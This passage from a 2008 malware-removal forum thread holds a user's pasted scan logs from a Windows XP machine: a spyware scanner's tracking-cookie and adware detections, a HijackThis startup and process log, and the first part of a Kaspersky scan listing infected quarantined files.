D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@ads.link4ads[3].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@ads.realcities[1].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@ads.weather[2].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@adserv.exxxit[1].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@adserver.infinit[2].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@adserver[1].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@advert.hi-media[2].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@advertising[2].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@advertising[3].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@advertsoft[2].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@atdmt[2].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@banners.inetfast[1].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@bfast[2].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@bizrate[2].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@bluestreak[1].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@cerambanners[1].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@click-fr[2].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@click-safe[1].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@clickagents[1].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@consumerreview.dealtime[2].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@dealtime[2].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@doubleclick[1].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@dwclick[1].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@earth.goclick[1].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@ehg-verticalwebventures.hitbox[2].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@ehg.hitbox[1].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@fastclick[1].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@fastclick[2].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@fastclick[4].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@fastclick[5].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@focusin.ads.targetnet[1].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@fortunecity[1].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@goclick[1].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@hc2.humanclick[2].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@hg1.hitbox[1].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@hg1.hitbox[2].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@hitbox[2].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@hitbox[3].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@hypercount[1].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@icover.realmedia[2].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@macromedia[2].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@mediaplex[2].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@mediaplex[3].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@music.windowsmedia.msn[1].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@overture[1].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@pathfinder[1].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@pbid.pro-market[2].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@pbid.pro-market[3].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@pro-market[1].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@pro-market[2].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@questionmarket[2].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@rd.advertising[1].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@servedby.advertising[1].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@servedby.advertising[2].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@server.iad.liveperson[2].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@targetnet[1].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@tpl1.realtracker[1].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@tribalfusion[1].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@tripod[1].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@valueclick[1].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@valueclick[2].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@weborama[1].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@www.cashcount[1].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@www.clickheretofind[1].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@www.commission-junction[1].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@www.findfreesheetmusic[2].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@www.popuptraffic[1].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@www.qksrv[1].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@www.top-finds[1].txt

Trojan.UnSpyPC Spyware Scanner
HKU\S-1-5-21-1390067357-764733703-1060284298-1003\Software\UnSpyPC

Trojan.Downloader-Gen/Suspicious
C:\CASINO LUX.EXE
C:\CASINO LUX.EXE.TCF
D:\BUSINESS\CASINO LUX\EMPEROR'S CLUB\EMPERORS CLUB CASINO.EXE

Adware.Casino Games (Golden Palace Casino)
C:\PROGRAM FILES\EVEREST POKER\CASINO.EXE
C:\PROGRAM FILES\GRANDVIRTUAL\POMPEY'S PALACE CASINO\CASINO.EXE
C:\PROGRAM FILES\GV EMPERORS CLUB CASINO\CASINO.EXE
D:\CASINOS\CASINO.EXE
D:\CASINOS\SKY INTERNATIONAL\CASINO.EXE
D:\OLD DRIVE D\ADVERTISING\CASINO\CASINO.EXE
D:\OLD DRIVE D\ADVERTISING\CASINO\CASINO2\CASINO.EXE
D:\OLD DRIVE D\FREECHIPCASINOS\CD-ROM PRESTIGE FILES\PRESTIGE_CD-ROM\CASINO.EXE

Adware.Vundo-Variant/Small-A
C:\SYSTEM VOLUME INFORMATION\_RESTORE{E3E090F3-343C-415F-A385-EABE1218138B}\RP1868\A0141638.DLL
C:\SYSTEM VOLUME INFORMATION\_RESTORE{E3E090F3-343C-415F-A385-EABE1218138B}\RP1868\A0141639.DLL
C:\SYSTEM VOLUME INFORMATION\_RESTORE{E3E090F3-343C-415F-A385-EABE1218138B}\RP1869\A0141659.DLL
C:\SYSTEM VOLUME INFORMATION\_RESTORE{E3E090F3-343C-415F-A385-EABE1218138B}\RP1870\A0141716.DLL
C:\SYSTEM VOLUME INFORMATION\_RESTORE{E3E090F3-343C-415F-A385-EABE1218138B}\RP1870\A0141717.DLL
C:\SYSTEM VOLUME INFORMATION\_RESTORE{E3E090F3-343C-415F-A385-EABE1218138B}\RP1870\A0141720.DLL
C:\SYSTEM VOLUME INFORMATION\_RESTORE{E3E090F3-343C-415F-A385-EABE1218138B}\RP1870\A0141721.DLL
C:\SYSTEM VOLUME INFORMATION\_RESTORE{E3E090F3-343C-415F-A385-EABE1218138B}\RP1870\A0141724.DLL
anthon69's Avatar
Junior Member with 9 posts.
  
Join Date: Apr 2008
07-Apr-2008, 09:28 PM #7
HIJACK THIS
~~~~~~~~

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 6:09:29 PM, on 4/7/2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\DigitalPersona\Bin\DPWinLct.exe
c:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
c:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\System32\CTsvcCDA.exe
c:\Program Files\Symantec AntiVirus\DefWatch.exe
C:\Program Files\DigitalPersona\Bin\DpHost.exe
C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
C:\WINDOWS\system32\nvsvc32.exe
c:\Program Files\Symantec AntiVirus\SavRoam.exe
C:\WINDOWS\System32\svchost.exe
c:\Program Files\Symantec AntiVirus\Rtvscan.exe
C:\Program Files\Viewpoint\Common\ViewpointService.exe
C:\Program Files\Webroot\Enterprise\Spy Sweeper\CommAgent.exe
C:\WINDOWS\System32\MsPMSPSv.exe
C:\Program Files\DigitalPersona\Bin\DPFUSMgr.exe
C:\Program Files\Webroot\Enterprise\Spy Sweeper\SpySweeper.exe
C:\WINDOWS\system32\WgaTray.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\SOUNDMAN.EXE
C:\Program Files\Creative\ShareDLL\CtNotify.exe
C:\WINDOWS\system32\CTHELPER.EXE
C:\Program Files\Creative\ShareDLL\MediaDet.exe
C:\Program Files\Java\jre1.5.0_10\bin\jusched.exe
C:\Program Files\ATI Technologies\ATI.ACE\cli.exe
C:\Program Files\Microsoft AntiSpyware\gcasDtServ.exe
D:\programs\HP\HP Software Update\HPWuSchd2.exe
C:\Program Files\QuickTime\qttask.exe
C:\Program Files\DigitalPersona\Bin\DPAgnt.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\wuauclt.exe
C:\WINDOWS\system32\RUNDLL32.EXE
C:\Program Files\Webroot\Enterprise\Spy Sweeper\SpySweeperUI.exe
C:\Program Files\Common Files\Symantec Shared\ccApp.exe
C:\PROGRA~1\SYMANT~1\VPTray.exe
C:\Program Files\Messenger\MSMSGS.EXE
C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BackWeb-8876480.exe
C:\Program Files\Skype\Phone\Skype.exe
C:\Program Files\AIM6\aim6.exe
C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
C:\WINDOWS\system32\wuauclt.exe
C:\Program Files\SEC\MagicTune 2.5\GammaTray.exe
C:\Program Files\Google\Google Updater\GoogleUpdater.exe
D:\Programs\HP\Digital Imaging\bin\hpqtra08.exe
D:\programs\HP\Digital Imaging\bin\hpqimzone.exe
C:\Program Files\Panasonic\LUMIXSimpleViewer\PhLeAutoRun.exe
C:\Program Files\Skype\Plugin Manager\skypePM.exe
C:\Program Files\Nikon\PictureProject\NkbMonitor.exe
D:\programs\HP\Digital Imaging\bin\hpqSTE08.exe
C:\Program Files\AIM6\aolsoftware.exe
D:\programs\HP\Digital Imaging\Product Assistant\bin\hprblog.exe
C:\PROGRA~1\MOZILL~1\FIREFOX.EXE
C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe
C:\WINDOWS\system32\notepad.exe
C:\Documents and Settings\tony\Desktop\HiJackThis.exe
C:\Program Files\Java\jre1.5.0_10\bin\jucheck.exe

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: Skype add-on (mastermind) - {22BF413B-C6D2-4d91-82A9-A0F997BA588C} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.5.0_10\bin\ssv.dll
O2 - BHO: Windows Live Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar2.dll
O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\2.1.615.5858\swg.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar2.dll
O4 - HKLM\..\Run: [SoundMan] SOUNDMAN.EXE
O4 - HKLM\..\Run: [EM_EXEC] C:\PROGRA~1\Logitech\MOUSEW~1\SYSTEM\EM_EXEC.EXE
O4 - HKLM\..\Run: [Disc Detector] C:\Program Files\Creative\ShareDLL\CtNotify.exe
O4 - HKLM\..\Run: [WINDVDPatch] CTHELPER.EXE
O4 - HKLM\..\Run: [UpdReg] C:\WINDOWS\UpdReg.EXE
O4 - HKLM\..\Run: [Jet Detection] "C:\Program Files\Creative\SBLive\PROGRAM\ADGJDet.exe"
O4 - HKLM\..\Run: [CTStartup] C:\Program Files\Creative\Splash Screen\CTEaxSpl.EXE /run
O4 - HKLM\..\Run: [gcasServ] "C:\Program Files\Microsoft AntiSpyware\gcasServ.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.5.0_10\bin\jusched.exe"
O4 - HKLM\..\Run: [Instant Buzz Daemon] C:\Program Files\Instant Buzz\IBDaemon.exe
O4 - HKLM\..\Run: [ATICCC] "C:\Program Files\ATI Technologies\ATI.ACE\cli.exe" runtime -Delay
O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINDOWS\system32\NeroCheck.exe
O4 - HKLM\..\Run: [HP Software Update] D:\programs\HP\HP Software Update\HPWuSchd2.exe
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [DPAgnt] C:\Program Files\DigitalPersona\Bin\DPAgnt.exe
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\system32\NvMcTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [SpySweeperEnterprise] "C:\Program Files\Webroot\Enterprise\Spy Sweeper\SpySweeperUI.exe" /StartInTray
O4 - HKLM\..\Run: [ccApp] "c:\Program Files\Common Files\Symantec Shared\ccApp.exe"
O4 - HKLM\..\Run: [vptray] c:\PROGRA~1\SYMANT~1\VPTray.exe
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\MSMSGS.EXE" /background
O4 - HKCU\..\Run: [LDM] C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BackWeb-8876480.exe
O4 - HKCU\..\Run: [Vidalia] "C:\Program Files\Vidalia Bundle\Vidalia\vidalia.exe"
O4 - HKCU\..\Run: [swg] C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
O4 - HKCU\..\Run: [Skype] "C:\Program Files\Skype\Phone\Skype.exe" /nosplash /minimized
O4 - HKCU\..\Run: [updateMgr] "C:\Program Files\Adobe\Acrobat 7.0\Reader\AdobeUpdateManager.exe" AcRdB7_0_9 -reboot 1
O4 - HKCU\..\Run: [Aim6] "C:\Program Files\AIM6\aim6.exe" /d locale=en-US ee://aol/imApp
O4 - HKCU\..\Run: [SUPERAntiSpyware] C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe
O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: Color Calibration.lnk = ?
O4 - Global Startup: Event Reminder.lnk = D:\PrintMaster\PrintMaster 16\pmremind.exe
O4 - Global Startup: Google Updater.lnk = C:\Program Files\Google\Google Updater\GoogleUpdater.exe
O4 - Global Startup: HP Digital Imaging Monitor.lnk = D:\Programs\HP\Digital Imaging\bin\hpqtra08.exe
O4 - Global Startup: HP Image Zone Fast Start.lnk = D:\Programs\HP\Digital Imaging\bin\hpqthb08.exe
O4 - Global Startup: Logitech Desktop Messenger.lnk = C:\Program Files\Logitech\Desktop Messenger\8876480\Program\LDMConf.exe
O4 - Global Startup: LUMIX Simple Viewer.lnk = ?
O4 - Global Startup: NkbMonitor.exe.lnk = C:\Program Files\Nikon\PictureProject\NkbMonitor.exe
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~3\Office10\EXCEL.EXE/3000
O8 - Extra context menu item: Sothink SWF Catcher - C:\Program Files\Common Files\SourceTec\SWF Catcher\InternetExplorer.htm
O9 - Extra button: Skype - {77BF5300-1474-4EC7-9980-D32B190E9B07} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O9 - Extra button: Sothink SWF Catcher - {E19ADC6E-3909-43E4-9A89-B7B676377EE3} - C:\Program Files\Common Files\SourceTec\SWF Catcher\InternetExplorer.htm
O9 - Extra 'Tools' menuitem: Sothink SWF Catcher - {E19ADC6E-3909-43E4-9A89-B7B676377EE3} - C:\Program Files\Common Files\SourceTec\SWF Catcher\InternetExplorer.htm
O16 - DPF: {5C6698D9-7BE4-4122-8EC5-291D84DBD4A0} (Facebook Photo Uploader 4 Control) - http://upload.facebook.com/controls/...oUploader3.cab
O16 - DPF: {5F8469B4-B055-49DD-83F7-62B522420ECC} (Facebook Photo Uploader Control) - http://upload.facebook.com/controls/...toUploader.cab
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://update.microsoft.com/windowsu...?1126034224607
O16 - DPF: {6B78B13A-6E99-4588-8EAB-C2399B202022} (iVocalize Web Conference 4 Setup) - http://www.edc.inetcommunicator.net/iv4.cab
O16 - DPF: {CCA0B877-CB5E-4ADC-AD30-457C379512DD} (Gif89 Lite Class) - http://69.42.9.110/xplugLiteAL.cab
O16 - DPF: {F137B9BA-89EA-4B04-9C67-2074A9DF61FD} (Photo Upload Plugin Class) - http://costco.pnimedia.com/upload/ac...v2.0.0.10.cab?
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\COMMON~1\Skype\SKYPE4~1.DLL
O20 - Winlogon Notify: !SASWinLogon - C:\Program Files\SUPERAntiSpyware\SASWINLO.dll
O20 - Winlogon Notify: DPWLN - C:\WINDOWS\system32\DPWLEvHd.dll
O23 - Service: Adobe LM Service - Unknown owner - C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe
O23 - Service: Symantec Event Manager (ccEvtMgr) - Symantec Corporation - c:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
O23 - Service: Symantec Password Validation (ccPwdSvc) - Symantec Corporation - c:\Program Files\Common Files\Symantec Shared\ccPwdSvc.exe
O23 - Service: Symantec Settings Manager (ccSetMgr) - Symantec Corporation - c:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
O23 - Service: Creative Service for CDROM Access - Creative Technology Ltd - C:\WINDOWS\System32\CTsvcCDA.exe
O23 - Service: Symantec AntiVirus Definition Watcher (DefWatch) - Symantec Corporation - c:\Program Files\Symantec AntiVirus\DefWatch.exe
O23 - Service: Windows XP FUS Manager (DPFUSMgr) - DigitalPersona, Inc. - C:\Program Files\DigitalPersona\Bin\DPFUSMgr.exe
O23 - Service: Biometric Authentication Service (DpHost) - DigitalPersona, Inc. - C:\Program Files\DigitalPersona\Bin\DpHost.exe
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe
O23 - Service: SAVRoam (SavRoam) - symantec - c:\Program Files\Symantec AntiVirus\SavRoam.exe
O23 - Service: Symantec Network Drivers Service (SNDSrvc) - Symantec Corporation - c:\Program Files\Common Files\Symantec Shared\SNDSrvc.exe
O23 - Service: Symantec AntiVirus - Symantec Corporation - c:\Program Files\Symantec AntiVirus\Rtvscan.exe
O23 - Service: Trackback Poster (TS Poster) - GungHo Technologies LLC - C:\Program Files\Trackback Spider\Poster Service.exe
O23 - Service: Viewpoint Manager Service - Viewpoint Corporation - C:\Program Files\Viewpoint\Common\ViewpointService.exe
O23 - Service: Webroot CommAgent Service (WebrootCommAgentService) - Webroot Software, Inc. - C:\Program Files\Webroot\Enterprise\Spy Sweeper\CommAgent.exe
O23 - Service: WebrootSpySweeperService - Webroot Software, Inc. - C:\Program Files\Webroot\Enterprise\Spy Sweeper\SpySweeper.exe

--
End of file - 11834 bytes
anthon69's Avatar
Junior Member with 9 posts.
  
Join Date: Apr 2008
07-Apr-2008, 09:30 PM #8
KASPERSKY LOG - PART 1

-------------------------------------------------------------------------------
KASPERSKY ONLINE SCANNER REPORT
Monday, April 07, 2008 9:14:54 PM
Operating System: Microsoft Windows XP Professional, Service Pack 2 (Build 2600)
Kaspersky Online Scanner version: 5.0.98.0
Kaspersky Anti-Virus database last update: 7/04/2008
Kaspersky Anti-Virus database records: 689065
-------------------------------------------------------------------------------

Scan Settings:
Scan using the following antivirus database: extended
Scan Archives: true
Scan Mail Bases: true

Scan Target - My Computer:
A:\
C:\
D:\
E:\
F:\
G:\
X:\

Scan Statistics:
Total number of scanned objects: 167033
Number of viruses found: 23
Number of infected objects: 202
Number of suspicious objects: 0
Duration of the scan process: 02:37:34

Infected Object Name / Virus Name / Last Action
C:\Documents and Settings\All Users\Application Data\Microsoft\Crypto\RSA\MachineKeys\c25454cd5d2e97322c31a3b9a1fe7043_da85 cdea-9103-4462-bb40-7ecab53fbe3c Object is locked skipped
C:\Documents and Settings\All Users\Application Data\Microsoft\Network\Downloader\qmgr0.dat Object is locked skipped
C:\Documents and Settings\All Users\Application Data\Microsoft\Network\Downloader\qmgr1.dat Object is locked skipped
C:\Documents and Settings\All Users\Application Data\Symantec\Common Client\settings.dat Object is locked skipped
C:\Documents and Settings\All Users\Application Data\Symantec\Symantec AntiVirus Corporate Edition\7.5\Quarantine\08880000.VBN/picture_003.jpeg-www.myspace.com Infected: Backdoor.Win32.IRCBot.aqz skipped
C:\Documents and Settings\All Users\Application Data\Symantec\Symantec AntiVirus Corporate Edition\7.5\Quarantine\08880000.VBN ZIP: infected - 1 skipped
C:\Documents and Settings\All Users\Application Data\Symantec\Symantec AntiVirus Corporate Edition\7.5\Quarantine\08880000.VBN CryptZ: infected - 1 skipped
C:\Documents and Settings\All Users\Application Data\Symantec\Symantec AntiVirus Corporate Edition\7.5\Quarantine\08880001.VBN/picture_003.jpeg-www.myspace.com Infected: Backdoor.Win32.IRCBot.aqz skipped
C:\Documents and Settings\All Users\Application Data\Symantec\Symantec AntiVirus Corporate Edition\7.5\Quarantine\08880001.VBN ZIP: infected - 1 skipped
C:\Documents and Settings\All Users\Application Data\Symantec\Symantec AntiVirus Corporate Edition\7.5\Quarantine\08880001.VBN CryptZ: infected - 1 skipped
C:\Documents and Settings\All Users\Application Data\Symantec\Symantec AntiVirus Corporate Edition\7.5\Quarantine\08880006.VBN/picture_004.jpeg-www.myspace.com Infected: Trojan.Win32.Delf.akj skipped
C:\Documents and Settings\All Users\Application Data\Symantec\Symantec AntiVirus Corporate Edition\7.5\Quarantine\08880006.VBN ZIP: infected - 1 skipped
C:\Documents and Settings\All Users\Application Data\Symantec\Symantec AntiVirus Corporate Edition\7.5\Quarantine\08880006.VBN CryptZ: infected - 1 skipped
C:\Documents and Settings\All Users\Application Data\Symantec\Symantec AntiVirus Corporate Edition\7.5\Quarantine\08880007.VBN/picture_004.jpeg-www.myspace.com Infected: Trojan.Win32.Delf.akj skipped
C:\Documents and Settings\All Users\Application Data\Symantec\Symantec AntiVirus Corporate Edition\7.5\Quarantine\08880007.VBN ZIP: infected - 1 skipped
C:\Documents and Settings\All Users\Application Data\Symantec\Symantec AntiVirus Corporate Edition\7.5\Quarantine\08880007.VBN CryptZ: infected - 1 skipped
C:\Documents and Settings\All Users\Application Data\Symantec\Symantec AntiVirus Corporate Edition\7.5\Quarantine\0888000A.VBN/bestodds.com/index_latest_aug8.html Infected: Trojan.JS.Seeker-based skipped
C:\Documents and Settings\All Users\Application Data\Symantec\Symantec AntiVirus Corporate Edition\7.5\Quarantine\0888000A.VBN/bestodds.com/index_latest_coins_aug10.html Infected: Trojan.JS.Seeker-based skipped
C:\Documents and Settings\All Users\Application Data\Symantec\Symantec AntiVirus Corporate Edition\7.5\Quarantine\0888000A.VBN/bestodds.com/index_with_homepage.html Infected: Trojan.JS.Seeker-based skipped
C:\Documents and Settings\All Users\Application Data\Symantec\Symantec AntiVirus Corporate Edition\7.5\Quarantine\0888000A.VBN/bestodds.com/index_ezulafix.html Infected: Trojan.JS.Seeker-based skipped
C:\Documents and Settings\All Users\Application Data\Symantec\Symantec AntiVirus Corporate Edition\7.5\Quarantine\0888000A.VBN/bestodds.com/index_homepage.html Infected: Trojan.JS.Seeker-based skipped
C:\Documents and Settings\All Users\Application Data\Symantec\Symantec AntiVirus Corporate Edition\7.5\Quarantine\0888000A.VBN/bestodds.com/bestcasinos.htm. Infected: Trojan.JS.Seeker-based skipped
C:\Documents and Settings\All Users\Application Data\Symantec\Symantec AntiVirus Corporate Edition\7.5\Quarantine\0888000A.VBN/bestodds.com/indextester.html Infected: Trojan.JS.Seeker-based skipped
C:\Documents and Settings\All Users\Application Data\Symantec\Symantec AntiVirus Corporate Edition\7.5\Quarantine\0888000A.VBN/bestodds.com/index_latest_encrypthome.html Infected: Trojan.JS.Seeker-based skipped
C:\Documents and Settings\All Users\Application Data\Symantec\Symantec AntiVirus Corporate Edition\7.5\Quarantine\0888000A.VBN/bestodds.com/index_coins_ontop.html Infected: Trojan.JS.Seeker-based skipped
C:\Documents and Settings\All Users\Application Data\Symantec\Symantec AntiVirus Corporate Edition\7.5\Quarantine\0888000A.VBN/bestodds.com/index_latest_with_bookmark.html Infected: Trojan.JS.Seeker-based skipped
C:\Documents and Settings\All Users\Application Data\Symantec\Symantec AntiVirus Corporate Edition\7.5\Quarantine\0888000A.VBN/bestodds.com/index_dec17_latest_with_homepage.html Infected: Trojan.JS.Seeker-based skipped
C:\Documents and Settings\All Users\Application Data\Symantec\Symantec AntiVirus Corporate Edition\7.5\Quarantine\0888000A.VBN/bestodds.com/index_feb2002_with_bookmark.html Infected: Trojan.JS.Seeker-based skipped
C:\Documents and Settings\All Users\Application Data\Symantec\Symantec AntiVirus Corporate Edition\7.5\Quarantine\0888000A.VBN/bestodds.com/index_latest_march21_with_rewards.html Infected: Trojan.JS.Seeker-based skipped
C:\Documents and Settings\All Users\Application Data\Symantec\Symantec AntiVirus Corporate Edition\7.5\Quarantine\0888000A.VBN/bestodds.com/index_latest_april3_before_newsimple.html Infected: Trojan.JS.Seeker-based skipped
C:\Documents and Settings\All Users\Application Data\Symantec\Symantec AntiVirus Corporate Edition\7.5\Quarantine\0888000A.VBN/bestodds.com/index_bookmark.html Infected: Trojan.JS.Seeker-based skipped
C:\Documents and Settings\All Users\Application Data\Symantec\Symantec AntiVirus Corporate Edition\7.5\Quarantine\0888000A.VBN Tar: infected - 15 skipped
C:\Documents and Settings\All Users\Application Data\Symantec\Symantec AntiVirus Corporate Edition\7.5\Quarantine\0888000A.VBN CryptZ: infected - 15 skipped
C:\Documents and Settings\All Users\Application Data\Symantec\Symantec AntiVirus Corporate Edition\7.5\Quarantine\0888000B.VBN/bestodds.com/index_latest_aug8.html Infected: Trojan.JS.Seeker-based skipped
C:\Documents and Settings\All Users\Application Data\Symantec\Symantec AntiVirus Corporate Edition\7.5\Quarantine\0888000B.VBN/bestodds.com/index_latest_coins_aug10.html Infected: Trojan.JS.Seeker-based skipped
C:\Documents and Settings\All Users\Application Data\Symantec\Symantec AntiVirus Corporate Edition\7.5\Quarantine\0888000B.VBN/bestodds.com/index_with_homepage.html Infected: Trojan.JS.Seeker-based skipped
C:\Documents and Settings\All Users\Application Data\Symantec\Symantec AntiVirus Corporate Edition\7.5\Quarantine\0888000B.VBN/bestodds.com/index_ezulafix.html Infected: Trojan.JS.Seeker-based skipped
C:\Documents and Settings\All Users\Application Data\Symantec\Symantec AntiVirus Corporate Edition\7.5\Quarantine\0888000B.VBN/bestodds.com/index_homepage.html Infected: Trojan.JS.Seeker-based skipped
